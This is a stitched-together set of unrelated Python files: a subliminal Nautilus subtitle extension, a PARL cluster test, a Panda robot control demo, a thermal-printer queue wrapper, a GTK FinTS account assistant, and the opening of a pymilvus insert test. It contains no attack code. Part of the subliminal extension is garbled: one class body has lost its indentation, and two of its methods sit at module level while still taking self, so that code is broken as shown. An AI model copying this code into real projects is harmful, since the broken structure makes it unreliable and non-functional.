from subliminal.cli import Config, MutexLock, cache_file, config_file, dirs
from subliminal.core import search_external_subtitles
# Use the extension's bundled translation catalog for gettext lookups.
locale.bindtextdomain('subliminal', os.path.join(os.path.dirname(__file__), 'subliminal', 'locale'))
locale.textdomain('subliminal')
# Ancient/historical/special language codes (e.g. 'und' = undetermined);
# presumably filtered out of the language list UI - usage is elsewhere.
ignored_languages = {Language(l) for l in (
    'ang', 'arc', 'dsb', 'dum', 'enm', 'frm', 'fro', 'gmh', 'goh', 'grc', 'ina', 'mga', 'mis', 'nds', 'non', 'ota',
    'peo', 'pro', 'sga', 'und'
)}
class ChooseHandler(object):
    """Signal handler for the choose window.
    This class will download the selected subtitle on row-activated signal.
    :param config: a configuration object.
    :type config: :class:`~subliminal.cli.Config`
    :param video: the video.
    :type video: :class:`~subliminal.video.Video`
    :param subtitles: the available of subtitles.
    :type subtitles: list of :class:`~subliminal.subtitle.Subtitle`
    :param spinner: the spinner to show during download.
    :type spinner: :class:`GtkSpinner`
    """
    def __init__(self, config, video, subtitles, spinner):
        self.config = config
        self.video = video
        # Index subtitles by "<provider>-<id>" for lookup from the liststore.
        self.subtitles = {s.provider_name + '-' + s.id: s for s in subtitles}
        self.spinner = spinner

    def on_subtitles_treeview_row_activated(self, treeview, path, view_column):
        # Liststore columns used here: 0 = subtitle id, 3 = provider name,
        # 6 = "already downloaded" flag.
        model = treeview.get_model()
        iter = model.get_iter(path)
        # return if already downloaded
        if model.get_value(iter, 6):
            return
        # get the subtitle object
        subtitle = self.subtitles[model.get_value(iter, 3).lower() + '-' + model.get_value(iter, 0)]
        # start the spinner
        self.spinner.start()
        def _download_subtitle():
            # download the subtitle
            with AsyncProviderPool(providers=self.config.providers,
                                   provider_configs=self.config.provider_configs) as pool:
                pool.download_subtitle(subtitle)
            # save the subtitle
            save_subtitles(self.video, [subtitle], single=self.config.single)
            # mark the subtitle as downloaded
            model.set_value(iter, 6, True)
            # stop the spinner
            self.spinner.stop()
        # NOTE(review): the GTK model and spinner are updated from this
        # worker thread rather than the main loop - confirm this is safe
        # for the targeted GTK version.
        threading.Thread(target=_download_subtitle).start()

    def on_subtitles_scrolledwindow_delete_event(self, *args):
        Gtk.main_quit(*args)
class ConfigHandler(object):
    """Signal handler for the configuration window.

    Converts values coming from the widgets and stores them on the
    configuration object; the configuration is written to disk when the
    window is closed.

    :param config: a configuration object.
    :type config: :class:`~subliminal.cli.Config`
    """

    def __init__(self, config):
        self.config = config

    def on_languages_treeview_selection_changed(self, selection):
        model, paths = selection.get_selected_rows()
        chosen = {Language.fromietf(model.get_value(model.get_iter(p), 1)) for p in paths}
        if chosen:
            self.config.languages = chosen

    def on_providers_treeview_selection_changed(self, selection):
        model, paths = selection.get_selected_rows()
        chosen = [model.get_value(model.get_iter(p), 0).lower() for p in paths]
        if chosen:
            self.config.providers = chosen

    def on_refiners_treeview_selection_changed(self, selection):
        model, paths = selection.get_selected_rows()
        # Unlike languages/providers, an empty refiner selection is stored.
        self.config.refiners = [model.get_value(model.get_iter(p), 0).lower() for p in paths]

    def on_single_switch_active_notify(self, switch, gparam):
        self.config.single = switch.get_active()

    def on_embedded_subtitles_switch_active_notify(self, switch, gparam):
        self.config.embedded_subtitles = switch.get_active()

    def on_age_spinbutton_value_changed(self, spin_button):
        self.config.age = timedelta(days=spin_button.get_value())

    def on_hearing_impaired_switch_active_notify(self, switch, gparam):
        self.config.hearing_impaired = switch.get_active()

    def on_min_score_spinbutton_value_changed(self, spin_button):
        self.config.min_score = spin_button.get_value()

    def on_config_window_delete_event(self, *args):
        self.config.write()
        Gtk.main_quit(*args)
class SubliminalExtension(GObject.GObject, Nautilus.MenuProvider):
def __init__(self):
# create app directory
try:
os.makedirs(dirs.user_cache_dir)
os.makedirs(dirs.user_config_dir)
except OSError:
if not os.path.isdir(dirs.user_cache_dir) or not os.path.isdir(dirs.user_config_dir):
raise
# open config file
self.config = Config(os.path.join(dirs.user_config_dir, config_file))
self.config.read()
# configure cache
region.configure('dogpile.cache.dbm', expiration_time=timedelta(days=30),
arguments={'filename': os.path.join(dirs.user_cache_dir, cache_file),
'lock_factory': MutexLock})
def get_file_items(self, window, files):
# lightweight filter on file type and extension
if not any(f.is_directory() or f.get_name().endswith(VIDEO_EXTENSIONS) for f in files):
return
# create subliminal menu
subliminal_menuitem = Nautilus.MenuItem(name='SubliminalMenu::Subliminal', label='Subliminal')
sub_menus = Nautilus.Menu()
subliminal_menuitem.set_submenu(sub_menus)
# create choose submenu on single file
if len(files) == 1 and not files[0].is_directory():
choose_menuitem = Nautilus.MenuItem(name='SubliminalSubMenu::Choose', label=_('Choose subtitles'))
choose_menuitem.connect('activate', self.choose_callback, files)
sub_menus.append_item(choose_menuitem)
# create download submenu
download_menuitem = Nautilus.MenuItem(name='SubliminalSubMenu::Download', label=_('Download subtitles'))
download_menuitem.connect('activate', self.download_callback, files)
sub_menus.append_item(download_menuitem)
# create configure submenu
configure_menuitem = Nautilus.MenuItem(name='SubliminalSubMenu::Configure', label=_('Configure...'))
configure_menuitem.connect('activate', self.config_callback)
sub_menus.append_item(configure_menuitem)
return subliminal_menuitem,
def get_background_items(self, window, current_folder):
return []
def choose_callback(self, menuitem, files):
# scan the video
video = scan_video(files[0].get_location().get_path())
refine(video, episode_refiners=self.config.refiners, movie_refiners=self.config.refiners,
embedded_subtitles=False)
# load the interface
builder = Gtk.Builder()
builder.set_translation_domain('subliminal')
builder.add_from_file(os.path.join(os.path.dirname(__file__), 'subliminal', 'ui', 'choose.glade'))
# set the video filename
video_filename = builder.get_object('video_filename_label')
video_filename.set_text(files[0].get_name())
# start the spinner
spinner = builder.get_object('spinner')
spinner.start()
def _list_subtitles():
# list subtitles
with AsyncProviderPool(providers=self.config.providers,
provider_configs=self.config.provider_configs) as pool:
subtitles = pool.list_subtitles(video, self.config.languages)
# fill the subtitle liststore
subtitle_liststore = builder.get_object('subtitle_liststore')
for s in subtitles:
scaled_score = compute_score(s, video)
scores = get_scores(video)
if s.hearing_impaired == self.config.hearing_impaired:
scaled_score -= scores['hearing_impaired']
scaled_score *= 100 / scores['hash']
subtitle_liststore.append([s.id, nice_language(s.language), scaled_score, s.provider_name.capitalize(),
s.hearing_impaired, s.page_link, False])
subtitle_liststore.set_sort_column_id(2, Gtk.SortType.DESCENDING)
# stop the spinner
spinner.stop()
# connect signals
builder.connect_signals(ChooseHandler(self.config, video, subtitles, spinner))
threading.Thread(target=_list_subtitles).start()
# display window
window = builder.get_object('subtitle_window')
window.show_all()
Gtk.main()
def download_callback(self, menuitem, files):
    """Download and save the best subtitles for all selected items.

    Directories are scanned recursively; unscannable inputs are skipped
    on a best-effort basis.

    :param menuitem: the activated :class:`Nautilus.MenuItem`.
    :param files: selected :class:`Nautilus.FileInfo` objects.
    """
    # scan videos
    videos = []
    for f in files:
        # ignore non-writable locations: subtitles could not be saved there
        if not f.can_write():
            continue
        # directories: scan recursively and keep videos that need subtitles
        if f.is_directory():
            try:
                scanned_videos = scan_videos(f.get_location().get_path())
            except Exception:
                # fix: was a bare 'except:', which also swallowed
                # SystemExit/KeyboardInterrupt; best-effort skip kept
                continue
            for video in scanned_videos:
                if check_video(video, languages=self.config.languages, age=self.config.age,
                               undefined=self.config.single):
                    video.subtitle_languages |= set(search_external_subtitles(video.name).values())
                    refine(video, episode_refiners=self.config.refiners, movie_refiners=self.config.refiners,
                           embedded_subtitles=self.config.embedded_subtitles)
                    videos.append(video)
            continue
        # other inputs: scan the single path, skipping non-videos
        try:
            video = scan_video(f.get_location().get_path())
        except Exception:
            # fix: narrowed from a bare 'except:' (see above)
            continue
        if check_video(video, languages=self.config.languages, undefined=self.config.single):
            video.subtitle_languages |= set(search_external_subtitles(video.name).values())
            refine(video, episode_refiners=self.config.refiners, movie_refiners=self.config.refiners,
                   embedded_subtitles=self.config.embedded_subtitles)
            videos.append(video)
    # download the best subtitles for every video, only for missing languages
    downloaded_subtitles = defaultdict(list)
    with AsyncProviderPool(providers=self.config.providers, provider_configs=self.config.provider_configs) as pool:
        for v in videos:
            scores = get_scores(v)
            subtitles = pool.download_best_subtitles(
                pool.list_subtitles(v, self.config.languages - v.subtitle_languages),
                v, self.config.languages, min_score=scores['hash'] * self.config.min_score / 100,
                hearing_impaired=self.config.hearing_impaired, only_one=self.config.single
            )
            downloaded_subtitles[v] = subtitles
    # save subtitles next to their videos
    for v, subtitles in downloaded_subtitles.items():
        save_subtitles(v, subtitles, single=self.config.single)
def config_callback(self, *args, **kwargs):
    """Open the configuration window.

    Loads the Glade UI, fills the language/provider/refiner lists from
    the installed plugins, pre-selects the current configuration values
    and shows the window with its own Gtk main loop.
    """
    # load the interface
    builder = Gtk.Builder()
    builder.set_translation_domain('subliminal')
    builder.add_from_file(os.path.join(os.path.dirname(__file__), 'subliminal', 'ui', 'config.glade'))
    # configure the about page
    aboutdialog = builder.get_object('aboutdialog')
    aboutdialog.set_version(__version__)
    aboutdialog.set_copyright(__copyright__)
    aboutdialog.vbox.reparent(builder.get_object('about_box'))
    # fill the language liststore with every language any provider supports
    available_languages = set()
    for provider in provider_manager:
        available_languages |= provider.plugin.languages
    language_liststore = builder.get_object('language_liststore')
    for language in sorted(available_languages - ignored_languages, key=nice_language):
        language_liststore.append([nice_language(language), str(language)])
    # pre-select the configured languages (column 1 holds the IETF code)
    language_treeselection = builder.get_object('language_treeselection')
    for language in language_liststore:
        if Language.fromietf(language[1]) in self.config.languages:
            language_treeselection.select_path(language.path)
    # fill the provider liststore
    provider_liststore = builder.get_object('provider_liststore')
    for provider in sorted([p.name for p in provider_manager]):
        provider_liststore.append([provider.capitalize(), str(self.config.provider_configs.get(provider, ''))])
    # pre-select the configured providers (column 0 is the capitalized name)
    provider_treeselection = builder.get_object('provider_treeselection')
    for provider in provider_liststore:
        if provider[0].lower() in self.config.providers:
            provider_treeselection.select_iter(provider.iter)
    # fill the refiner liststore, listing the configured refiners first
    refiner_liststore = builder.get_object('refiner_liststore')
    for refiner in sorted([r.name for r in refiner_manager], key=lambda r: (r not in self.config.refiners, r)):
        refiner_liststore.append([refiner.capitalize()])
    # pre-select the configured refiners
    refiner_treeselection = builder.get_object('refiner_treeselection')
    for refiner in refiner_liststore:
        if refiner[0].lower() in self.config.refiners:
            refiner_treeselection.select_iter(refiner.iter)
    # set single state
    single_switch = builder.get_object('single_switch')
    single_switch.set_active(self.config.single)
    # set embedded subtitles state
    embedded_subtitles_switch = builder.get_object('embedded_subtitles_switch')
    embedded_subtitles_switch.set_active(self.config.embedded_subtitles)
    # set age value (configured age is a timedelta; shown in days)
    age_spinbutton = builder.get_object('age_spinbutton')
    age_spinbutton.set_value(self.config.age.days)
    # set hearing impaired state
    hearing_impaired_switch = builder.get_object('hearing_impaired_switch')
    hearing_impaired_switch.set_active(self.config.hearing_impaired)
    # set min score value
    min_score_spinbutton = builder.get_object('min_score_spinbutton')
    min_score_spinbutton.set_value(self.config.min_score)
    # connect signals
    builder.connect_signals(ConfigHandler(self.config))
    # display window and run a nested main loop
    window = builder.get_object('config_window')
    window.show_all()
    Gtk.main()
def nice_language(language):
    """Format a :class:`~babelfish.Language` as a human-friendly string.

    The country name, when present, is appended in parentheses.

    :param language: the language to format.
    :type language: :class:`~babelfish.Language`
    :return: a nice representation of the language.
    :rtype: str
    """
    country = language.country
    if country is None:
        return language.name
    return '{name} ({country})'.format(name=language.name, country=country.name.capitalize())
|
future_mode_cluster_2_test.py | # Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import parl
import time
import subprocess
import threading
from parl.remote.master import Master
from parl.remote.worker import Worker
from parl.remote.client import disconnect
from parl.remote import exceptions
from parl.utils import get_free_tcp_port
@parl.remote_class(wait=False)
class Actor(object):
    """Remote actor exposing simple state accessors and arithmetic helpers.

    Decorated with wait=False, so method calls return future objects.
    """

    def __init__(self, arg1=None, arg2=None):
        self.arg1 = arg1
        self.arg2 = arg2

    def get_arg1(self):
        return self.arg1

    def get_arg2(self):
        return self.arg2

    def set_arg1(self, value):
        self.arg1 = value

    def set_arg2(self, value):
        self.arg2 = value

    def add_one(self, value):
        # return the incremented value without mutating caller state
        return value + 1

    def add(self, x, y):
        # simulate a slow remote computation
        time.sleep(3)
        return x + y

    def will_raise_exception_func(self):
        # deliberately raises ZeroDivisionError for exception-propagation tests
        return 1 / 0
class TestCluster(unittest.TestCase):
    """Integration test for the future-mode (wait=False) PARL cluster."""

    def tearDown(self):
        # disconnect the client and give the cluster time to release its
        # resources before the next test case starts
        disconnect()
        time.sleep(60)  # wait for test case finishing

    def test_reset_actor(self):
        """CPUs must be returned to the master after actors are deleted."""
        port = get_free_tcp_port()
        # start the master on its own thread (master.run blocks)
        master = Master(port=port)
        th = threading.Thread(target=master.run)
        th.start()
        time.sleep(3)
        # attach one worker offering 4 CPUs, then connect a client
        worker1 = Worker('localhost:{}'.format(port), 4)
        parl.connect('localhost:{}'.format(port))
        # repeatedly create an actor, use it, and delete it
        for _ in range(10):
            actor = Actor()
            future_result = actor.add_one(1)
            self.assertEqual(future_result.get(), 2)
            del actor
        # poll (up to ~100 s) until all 4 CPUs are reported free again
        for _ in range(10):
            if master.cpu_num == 4:
                break
            time.sleep(10)
        self.assertEqual(master.cpu_num, 4)
        worker1.exit()
        master.exit()
# run the cluster test suite when executed directly
if __name__ == '__main__':
    unittest.main()
|
task_space_control_using_sim_only.py | #! /usr/bin/env python
# /***************************************************************************
#
# @package: panda_siimulator_examples
# @metapackage: panda_simulator
# @author: Saif Sidhik <sxs1412@bham.ac.uk>
#
# **************************************************************************/
# /***************************************************************************
# Copyright (c) 2019-2021, Saif Sidhik
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# **************************************************************************/
"""
This is a demo showing task-space control on the
simulator robot using the ROS topics and messages directly
from panda_simulator. The task-space force for the desired
pose is computed using a simple PD law, and the corresponding
joint torques are computed and sent to the robot.
After launching the simulator (panda_world.launch),
run this demo using the command:
roslaunch panda_simulator_examples demo_task_space_control.launch --use_fri:=false
"""
import copy
import rospy
import threading
import quaternion
import numpy as np
from geometry_msgs.msg import Point
from visualization_msgs.msg import *
from interactive_markers.interactive_marker_server import *
from franka_core_msgs.msg import EndPointState, JointCommand, RobotState
from rviz_markers import RvizMarkers
# --------- Modify as required ------------
# Task-space controller parameters
# stiffness gains
P_pos = 50.
P_ori = 25.
# damping gains
D_pos = 10.
D_ori = 1.
# -----------------------------------------
publish_rate = 100
JACOBIAN = None
CARTESIAN_POSE = None
CARTESIAN_VEL = None
destination_marker = RvizMarkers()
def _on_robot_state(msg):
    """
    Callback function for updating jacobian and EE velocity from robot state

    :param msg: franka_core_msgs/RobotState; O_Jac_EE is a column-major
        flattened 6x7 jacobian and O_dP_EE a 6-vector end-effector
        velocity (linear components first, then angular).
    """
    global JACOBIAN, CARTESIAN_VEL
    # the jacobian arrives flattened column-major, hence order='F'
    JACOBIAN = np.asarray(msg.O_Jac_EE).reshape(6,7,order = 'F')
    # split the twist into linear and angular parts for the control loop
    CARTESIAN_VEL = {
        'linear': np.asarray([msg.O_dP_EE[0], msg.O_dP_EE[1], msg.O_dP_EE[2]]),
        'angular': np.asarray([msg.O_dP_EE[3], msg.O_dP_EE[4], msg.O_dP_EE[5]]) }
def _on_endpoint_state(msg):
    """
    Callback function to get current end-point state

    :param msg: franka_core_msgs/EndPointState; O_T_EE is a column-major
        flattened 4x4 homogeneous transform of the end effector.
    """
    # pose message received is a vectorised column major transformation matrix
    global CARTESIAN_POSE
    cart_pose_trans_mat = np.asarray(msg.O_T_EE).reshape(4,4,order='F')
    # split the transform into a position vector and a quaternion orientation
    CARTESIAN_POSE = {
        'position': cart_pose_trans_mat[:3,3],
        'orientation': quaternion.from_rotation_matrix(cart_pose_trans_mat[:3,:3]) }
def quatdiff_in_euler(quat_curr, quat_des):
    """
    Return the orientation error between two quaternions as a 3-vector.

    :param quat_curr: current orientation (numpy quaternion)
    :param quat_des: desired orientation (numpy quaternion)
    :return: 3-element numpy array usable as the orientation error term
    """
    curr_mat = quaternion.as_rotation_matrix(quat_curr)
    des_mat = quaternion.as_rotation_matrix(quat_des)
    # relative rotation expressed in the desired frame
    rel_quat = quaternion.from_rotation_matrix(des_mat.T.dot(curr_mat))
    vec = quaternion.as_float_array(rel_quat)[1:]
    # flip the vector part on a negative scalar to keep the shortest rotation
    if rel_quat.w < 0.0:
        vec = -vec
    return -des_mat.dot(vec)
def control_thread(rate):
    """
    Actual control loop. Uses goal pose from the feedback thread
    and current robot states from the subscribed messages to compute
    task-space force, and then the corresponding joint torques.

    :param rate: rospy.Rate throttling the command publishing frequency.
    """
    while not rospy.is_shutdown():
        # seed the error above the threshold so the inner loop runs at
        # least once per outer iteration
        error = 100.
        while error > 0.005:
            # snapshot shared state written by the subscriber callbacks
            curr_pose = copy.deepcopy(CARTESIAN_POSE)
            curr_pos, curr_ori = curr_pose['position'],curr_pose['orientation']
            curr_vel = (CARTESIAN_VEL['linear']).reshape([3,1])
            curr_omg = CARTESIAN_VEL['angular'].reshape([3,1])
            # pose error w.r.t. the goal set by the marker feedback callback
            delta_pos = (goal_pos - curr_pos).reshape([3,1])
            delta_ori = quatdiff_in_euler(curr_ori, goal_ori).reshape([3,1])
            # Desired task-space force using PD law
            F = np.vstack([P_pos*(delta_pos), P_ori*(delta_ori)]) - \
                np.vstack([D_pos*(curr_vel), D_ori*(curr_omg)])
            error = np.linalg.norm(delta_pos) + np.linalg.norm(delta_ori)
            J = copy.deepcopy(JACOBIAN)
            # joint torques to be commanded: tau = J^T * F
            tau = np.dot(J.T,F)
            # publish joint commands at the configured rate
            command_msg.effort = tau.flatten()
            joint_command_publisher.publish(command_msg)
            rate.sleep()
def process_feedback(feedback):
    """
    InteractiveMarker callback: update the goal pose on mouse release.
    """
    global goal_pos, goal_ori
    # only act once the user releases the marker
    if feedback.event_type != InteractiveMarkerFeedback.MOUSE_UP:
        return
    pos = feedback.pose.position
    ori = feedback.pose.orientation
    goal_pos = np.array([pos.x, pos.y, pos.z])
    goal_ori = np.quaternion(ori.w, ori.x, ori.y, ori.z)
def _on_shutdown():
    """
    Clean shutdown controller thread when rosnode dies.

    The control thread exits on its own once rospy.is_shutdown() becomes
    true; it is joined first, then all topic handles are unregistered.
    """
    global ctrl_thread, cartesian_state_sub, \
        robot_state_sub, joint_command_publisher
    if ctrl_thread.is_alive():
        ctrl_thread.join()
    robot_state_sub.unregister()
    cartesian_state_sub.unregister()
    joint_command_publisher.unregister()
if __name__ == "__main__":
    # global goal_pos, goal_ori, ctrl_thread
    rospy.init_node("ts_control_sim_only")
    # if not using franka_ros_interface, you have to subscribe to the right
    # topics to obtain the current end-effector state and robot jacobian for
    # computing commands
    cartesian_state_sub = rospy.Subscriber(
        'panda_simulator/custom_franka_state_controller/tip_state',
        EndPointState,
        _on_endpoint_state,
        queue_size=1,
        tcp_nodelay=True)
    robot_state_sub = rospy.Subscriber(
        'panda_simulator/custom_franka_state_controller/robot_state',
        RobotState,
        _on_robot_state,
        queue_size=1,
        tcp_nodelay=True)
    # create joint command message and fix its type to joint torque mode
    command_msg = JointCommand()
    command_msg.names = ['panda_joint1','panda_joint2','panda_joint3',\
        'panda_joint4','panda_joint5','panda_joint6','panda_joint7']
    command_msg.mode = JointCommand.TORQUE_MODE
    # Also create a publisher to publish joint commands
    joint_command_publisher = rospy.Publisher(
        'panda_simulator/motion_controller/arm/joint_commands',
        JointCommand,
        tcp_nodelay=True,
        queue_size=1)
    # wait for messages to be populated before proceeding
    rospy.loginfo("Subscribing to robot state topics...")
    # fix: the original loop busy-spun at 100% CPU with no sleep and could
    # not be interrupted; sleep briefly and bail out on node shutdown
    while not rospy.is_shutdown():
        if not (JACOBIAN is None or CARTESIAN_POSE is None):
            break
        rospy.sleep(0.1)
    rospy.loginfo("Received messages; Starting Demo.")
    # initial goal pose is the current pose, so the robot holds position
    pose = copy.deepcopy(CARTESIAN_POSE)
    start_pos, start_ori = pose['position'], pose['orientation']
    goal_pos, goal_ori = start_pos, start_ori  # set goal pose to the starting pose in the beginning
    # start controller thread
    rospy.on_shutdown(_on_shutdown)
    rate = rospy.Rate(publish_rate)
    ctrl_thread = threading.Thread(target=control_thread, args=[rate])
    ctrl_thread.start()
    # ------------------------------------------------------------------------------------
    # interactive marker the user drags to set a new goal pose in RViz
    server = InteractiveMarkerServer("basic_control")
    position = Point(start_pos[0], start_pos[1], start_pos[2])
    marker = destination_marker.makeMarker(False, InteractiveMarkerControl.MOVE_ROTATE_3D,
                                           position, quaternion.as_float_array(start_ori), True)
    server.insert(marker, process_feedback)
    server.applyChanges()
    rospy.spin()
# ------------------------------------------------------------------------------------ |
printer.py | from .Adafruit_Thermal import Adafruit_Thermal
import threading
import queue
import time
from .format import format as fmt
class _ShutDownPrinter:
    """Sentinel queued to tell the print worker thread to exit."""
    pass
class Printer(Adafruit_Thermal):
    """Thermal printer with a background worker that serialises print jobs.

    Jobs are queued as zero-argument callables and executed one at a time
    on a worker thread, so callers never block on the slow printer.
    """

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self._print_queue = queue.Queue()
        self.thread = threading.Thread(target=self._print_from_async_print_queue)
        self.thread.start()

    def _print_from_async_print_queue(self):
        """Worker loop: run queued callables until the shutdown sentinel."""
        while True:
            job = self._print_queue.get()
            try:
                if isinstance(job, _ShutDownPrinter):
                    return
                job()
            finally:
                self._print_queue.task_done()

    def async_print(self, *args, **kwargs):
        """Queue a print() call."""
        self._print_queue.put(lambda: self.print(*args, **kwargs))

    def async_println(self, *args, **kwargs):
        """Queue a println() call."""
        self._print_queue.put(lambda: self.println(*args, **kwargs))

    def async_feed(self, *args, **kwargs):
        """Queue a paper feed."""
        self._print_queue.put(lambda: self.feed(*args, **kwargs))

    def async_wait(self, t):
        """Queue a pause of *t* seconds between jobs."""
        self._print_queue.put(lambda: time.sleep(t))

    def batch_print(self, message):
        """Print a long message in throttled chunks.

        Flooding the printer with a heap of data causes a backlog and
        skipped lines, so only a handful of characters (180, found by
        rough trial and error) are sent before pausing for a second.
        """
        remaining = fmt(message, self.maxColumn)
        while remaining:
            chunk = remaining[:180]
            remaining = remaining[180:]
            self.async_print(chunk)
            self.async_wait(1)
        self.async_println()
        self.async_feed(3)

    def cleanup(self):
        """Stop the worker thread after all queued jobs have run."""
        self._print_queue.put(_ShutDownPrinter())
        self.thread.join()
|
add_account_assistant.py | import gi, logging
gi.require_version('Gtk', '3.0')
from gi.repository import Gtk, Gdk, GObject, GLib
from schwifty import IBAN
import fints_url
from urllib.parse import urlparse
import threading
class AddAccountAssistant(Gtk.Assistant):
    """Gtk.Assistant guiding the user through adding a bank account.

    Page 1 collects account name, owner and IBAN (validated live);
    page 2 collects the FinTS connection details (URL, login, password).
    The FinTS URL is resolved from the IBAN on a background thread.
    """

    def __init__(self, model):
        super().__init__(use_header_bar=True)
        self.model = model
        self.init_page_1()
        self.init_page_2()
        # run the validators once so every entry shows its initial status icon
        self.on_entry_changed(self.entry_iban)
        self.on_entry_changed(self.entry_name)
        self.on_entry_changed(self.entry_owner)
        self.on_entry_changed(self.entry_url)
        self.on_entry_changed(self.entry_login)
        self.on_entry_changed(self.entry_pass)
        self.show_all()

    def do_cancel(self):
        self.hide()

    def do_apply(self):
        self.hide() # FIXME

    def do_prepare(self, page):
        pass

    def set_entry_status(self, entry, valid, hint):
        """Show an ok/important status icon on *entry* (hint currently unused)."""
        entry.set_icon_from_icon_name(Gtk.EntryIconPosition.SECONDARY, "emblem-ok-symbolic" if valid else "emblem-important-symbolic")
        # FIXME entry.set_icon_tooltip_text(Gtk.EntryIconPosition.SECONDARY, hint);
        entry.set_icon_activatable(Gtk.EntryIconPosition.SECONDARY, False)
        entry.set_icon_sensitive(Gtk.EntryIconPosition.SECONDARY, True)

    def on_entry_changed(self, entry):
        """Validate the changed entry and refresh page completeness."""
        if entry is self.entry_name:
            if not len(entry.get_text()):
                self.set_entry_status(entry, False, "Please enter an account name.")
                self.page_1_name = False
            else:
                self.set_entry_status(entry, True, None)
                self.page_1_name = True
        elif entry is self.entry_owner:
            if not len(entry.get_text()):
                self.set_entry_status(entry, False, "Please enter an account owner.")
                self.page_1_owner = False
            else:
                self.set_entry_status(entry, True, None)
                self.page_1_owner = True
        elif entry is self.entry_iban:
            iban = None
            try:
                iban = IBAN(entry.get_text())
                self.set_entry_status(entry, True, None)
                self.page_1_iban = True
            except Exception:
                # fix: the hint wrongly asked for an account owner; also
                # narrowed from a bare 'except:'
                self.set_entry_status(entry, False, "Please enter a valid IBAN.")
                self.page_1_iban = False
            if iban:
                # resolve the FinTS URL in the background; UI updates go
                # through GLib.idle_add in the worker
                threading.Thread(target=self.async_fints_url_finder, args=(iban,), daemon=True).start()
        elif entry is self.entry_url:
            try:
                # validate the typed URL, or the auto-detected placeholder
                urlparse(entry.get_text() if entry.get_text() else entry.get_placeholder_text())
                self.set_entry_status(entry, True, None)
            except Exception:
                self.set_entry_status(entry, False, "Please enter the banks FinTS URL.")
        elif entry is self.entry_login:
            if not entry.get_text():
                self.set_entry_status(entry, False, "Please enter FinTS login name.")
            else:
                self.set_entry_status(entry, True, None)
        elif entry is self.entry_pass:
            if not entry.get_text():
                self.set_entry_status(entry, False, "Please enter FinTS password.")
            else:
                self.set_entry_status(entry, True, None)
        self.set_page_complete(self.get_nth_page(0), self.page_1_name and self.page_1_owner and self.page_1_iban)
        self.set_page_complete(self.get_nth_page(1), False) #Fixme

    def async_fints_url_finder(self, iban):
        """Look up the bank's FinTS URL for *iban* (runs on a worker thread).

        All widget updates are marshalled onto the main loop via
        GLib.idle_add; failures are silently ignored so the user can still
        type the URL manually.
        """
        try:
            url = fints_url.find(iban=iban)
            GLib.idle_add(self.entry_url.set_placeholder_text, url)
            if not self.entry_url.get_text():
                GLib.idle_add(self.entry_url.set_text, url)
                GLib.idle_add(self.entry_url.select_region, -1, 0)
            # bug fix: was 'Glib.idle_add' (NameError silently swallowed by
            # the except below), so the URL entry was never re-validated
            # after auto-detection
            GLib.idle_add(self.on_entry_changed, self.entry_url)
        except Exception:
            pass

    def init_page_1(self):
        """Build the first page: account name, owner and IBAN entries."""
        self.page_1_name = False
        self.page_1_owner = False
        self.page_1_iban = False
        grid = Gtk.Grid(row_spacing=10, column_spacing=10)
        self.entry_name = Gtk.Entry(input_purpose=Gtk.InputPurpose.NAME, hexpand=True)
        self.entry_name.connect('changed', self.on_entry_changed)
        self.entry_owner = Gtk.Entry(input_purpose=Gtk.InputPurpose.NAME, hexpand=True)
        self.entry_owner.connect('changed', self.on_entry_changed)
        self.entry_iban = Gtk.Entry(input_purpose=Gtk.InputPurpose.FREE_FORM, hexpand=True)
        self.entry_iban.connect('changed', self.on_entry_changed)
        grid.attach(Gtk.Label(label='''
To create an account please fill in the account details.
Account name and owner name can be arbitarly choosen by you.
''', xalign=0, hexpand=True), 1, 0, 1, 1)
        grid.attach(Gtk.Label(label="Account Name", xalign=1.0), 0, 1, 1, 1)
        grid.attach(self.entry_name, 1, 1, 1, 1)
        grid.attach(Gtk.Label(label="Owner Name", xalign=1.0), 0, 2, 1, 1)
        grid.attach(self.entry_owner, 1, 2, 1, 1)
        grid.attach(Gtk.Label(label='''
Account name and owner name can be arbitarly choosen by you.
Saldo automatically determines the bank from the accounts IBAN.
''', xalign=0, hexpand=True), 1, 3, 1, 1)
        grid.attach(Gtk.Label(label="IBAN", xalign=1.0), 0, 4, 1, 1)
        grid.attach(self.entry_iban, 1, 4, 1, 1)
        self.append_page(grid)

    def init_page_2(self):
        """Build the second page: FinTS URL, login and password entries."""
        grid = Gtk.Grid(row_spacing=10, column_spacing=10)
        self.entry_url = Gtk.Entry(input_purpose=Gtk.InputPurpose.URL, hexpand=True)
        self.entry_url.connect('changed', self.on_entry_changed)
        self.entry_login = Gtk.Entry(input_purpose=Gtk.InputPurpose.FREE_FORM, hexpand=True)
        self.entry_login.connect('changed', self.on_entry_changed)
        self.entry_pass = Gtk.Entry(input_purpose=Gtk.InputPurpose.PASSWORD, hexpand=True)
        self.entry_pass.connect('changed', self.on_entry_changed)
        grid.attach(Gtk.Label(label="Please fill in the banks connection details.", xalign=0), 0, 0, 2, 1)
        grid.attach(Gtk.Label(label="FinTS URL", xalign=1.0), 0, 1, 1, 1)
        grid.attach(self.entry_url, 1, 1, 1, 1)
        grid.attach(Gtk.Label(label="Login", xalign=1.0), 0, 2, 1, 1)
        grid.attach(self.entry_login, 1, 2, 1, 1)
        grid.attach(Gtk.Label(label="Password", xalign=1.0), 0, 3, 1, 1)
        grid.attach(self.entry_pass, 1, 3, 1, 1)
        self.append_page(grid)
|
test_insert.py | import pytest
from pymilvus import DataType, ParamError, BaseException
from utils import *
from constants import *
ADD_TIMEOUT = 60
uid = "test_insert"
field_name = default_float_vec_field_name
binary_field_name = default_binary_vec_field_name
default_single_query = {
"bool": {
"must": [
{"vector": {field_name: {"topk": 10, "query": gen_vectors(1, default_dim), "metric_type": "L2",
"params": {"nprobe": 10}}}}
]
}
}
class TestInsertBase:
"""
